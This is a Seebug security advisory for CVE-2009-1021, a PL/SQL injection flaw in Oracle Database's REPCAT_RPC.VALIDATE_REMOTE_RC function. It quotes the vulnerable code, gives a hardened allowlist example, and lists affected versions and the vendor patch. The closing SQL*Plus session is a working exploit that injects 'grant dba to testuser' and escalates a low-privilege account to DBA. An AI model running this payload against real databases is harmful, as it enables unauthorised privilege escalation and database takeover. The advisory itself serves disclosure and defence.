www.seebug.org, Root, SSV:12587
Nov 07, 2009 - 12:00 a.m.

Oracle Advanced Replication component REPCAT_RPC.VALIDATE_REMOTE_RC() function privilege escalation vulnerability


EPSS: 0.007 (Low), Percentile: 78.6%

BUGTRAQ ID: 35685
CVE ID: CVE-2009-1021

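Oracle Database is a large-scale commercial database system.

The REPCAT_RPC.VALIDATE_REMOTE_RC() function in the Advanced Replication component of Oracle Database executes anonymous PL/SQL that may be attacker-controlled. The function takes the name of the currently logged-in user as its first parameter, and the second parameter, VALIDATE_STRING, is placed directly into an anonymous PL/SQL block and executed: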



SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
-- VALIDATE_STRING is concatenated into the block text, not bound
DBMS_SQL.PARSE(SQL_CURSOR, 'BEGIN ' || ' :err :=
sys.dbms_repcat_validate.' || VALIDATE_STRING || '(:canon_gname);' || '
END;', DBMS_SQL.V7);
-- only :err and :canon_gname are passed as bind variables
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'err', ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'canon_gname', CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);

This may allow an attacker to execute arbitrary code with elevated privileges.
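The same DBMS_SQL dispatch pattern with the routine name validated before it is concatenated, as an added example that is not Oracle's code or the actual patch. The package DEMO_VALIDATE, its function and VALIDATE_REMOTE_RC_SAFE are hypothetical stand-ins for sys.dbms_repcat_validate and the vulnerable function.

```sql
-- Hypothetical stand-in for sys.dbms_repcat_validate (assumption, demo only).
CREATE OR REPLACE PACKAGE demo_validate AS
  FUNCTION validate_grp_objects_local(canon_gname IN VARCHAR2) RETURN NUMBER;
END demo_validate;
/
CREATE OR REPLACE PACKAGE BODY demo_validate AS
  FUNCTION validate_grp_objects_local(canon_gname IN VARCHAR2) RETURN NUMBER IS
  BEGIN
    RETURN 0;  -- placeholder result for the demo
  END;
END demo_validate;
/
-- Hardened dispatcher (hypothetical name): the routine name must be a bare
-- identifier AND on an allowlist before it reaches the dynamic block.
CREATE OR REPLACE FUNCTION validate_remote_rc_safe(
  validate_string IN VARCHAR2,
  canon_gname     IN VARCHAR2) RETURN NUMBER
IS
  sql_cursor INTEGER;
  err        NUMBER;
  dummy      INTEGER;
  fn_name    VARCHAR2(128);
BEGIN
  -- 1. Anything containing '(', ';', quotes or spaces inside the name is
  --    rejected here with ORA-44003 (invalid SQL name).
  fn_name := UPPER(DBMS_ASSERT.SIMPLE_SQL_NAME(validate_string));
  -- 2. Only known validation routines may be dispatched.
  IF fn_name NOT IN ('VALIDATE_GRP_OBJECTS_LOCAL') THEN
    RAISE_APPLICATION_ERROR(-20001, 'unsupported validation routine');
  END IF;
  sql_cursor := DBMS_SQL.OPEN_CURSOR;
  BEGIN
    DBMS_SQL.PARSE(sql_cursor,
      'BEGIN :err := demo_validate.' || fn_name || '(:canon_gname); END;',
      DBMS_SQL.NATIVE);
    DBMS_SQL.BIND_VARIABLE(sql_cursor, 'err', err);
    DBMS_SQL.BIND_VARIABLE(sql_cursor, 'canon_gname', canon_gname);
    dummy := DBMS_SQL.EXECUTE(sql_cursor);
    DBMS_SQL.VARIABLE_VALUE(sql_cursor, 'err', err);  -- read the OUT bind
  EXCEPTION WHEN OTHERS THEN
    DBMS_SQL.CLOSE_CURSOR(sql_cursor);  -- do not leak the cursor on error
    RAISE;
  END;
  DBMS_SQL.CLOSE_CURSOR(sql_cursor);
  RETURN err;
END;
/
```

Calling `validate_remote_rc_safe('VALIDATE_GRP_OBJECTS_LOCAL', 'G1')` returns 0, while any value that is not a single allowlisted identifier fails before DBMS_SQL.PARSE is reached.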

Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5
Vendor patch:

Oracle

Oracle has released a security advisory (cpujul2009) and corresponding patches for this issue:
cpujul2009: Oracle Critical Patch Update Advisory - July 2009
Link: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html


SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
...
...
MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>
                              
